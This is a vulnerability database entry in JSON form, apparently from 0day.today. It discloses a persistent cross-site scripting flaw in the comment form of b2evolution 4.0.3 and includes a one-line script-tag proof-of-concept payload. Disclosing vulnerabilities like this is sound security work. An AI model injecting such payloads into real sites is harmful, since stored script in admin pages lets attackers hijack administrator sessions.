Description
Exploit for php platform in category web applications
{"id": "1337DAY-ID-15628", "type": "zdt", "bulletinFamily": "exploit", "title": "b2evolution 4.0.3 Persistent XSS Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2011-03-17T00:00:00", "modified": "2011-03-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/15628", "reporter": "AutoSec Tools", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-08T23:43:15", "viewCount": 7, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/15628", "sourceData": "------------------------------------------------------------------------\r\nSoftware................b2evolution 4.0.3\r\nVulnerability...........Persistent Cross-site Scripting\r\nThreat Level............Moderate (2/5)\r\nDownload................http://b2evolution.net/\r\nVendor Contact Date.....3/15/2011\r\nDisclosure Date.........3/15/2011\r\nTested On...............Windows Vista + XAMPP\r\n------------------------------------------------------------------------\r\nAuthor..................AutoSec Tools\r\nSite....................http://www.autosectools.com/\r\nEmail...................John Leitch <[email\u00a0protected]>\r\n------------------------------------------------------------------------\r\n \r\n \r\n--Description--\r\n \r\nA persistent cross-site scripting vulnerability in b2evolution 4.0.3\r\ncan be exploited to execute arbitrary JavaScript.\r\n \r\n \r\n--Exploit--\r\n \r\nData submitted to the \"Comment text\" input of the blog comment form is\r\nnot properly santized. 
As a result, javascript can be executed\r\nthroughout the application (admin dashboard, admin comment full text\r\nview, possibly other pages).\r\n \r\n \r\n--PoC--\r\n \r\n<?<a><script>alert(0)</script>\r\n\r\n\n\n# 0day.today [2018-04-08] #", "_state": {"dependencies": 1645382083, "score": 1659766679, "epss": 1678811959}}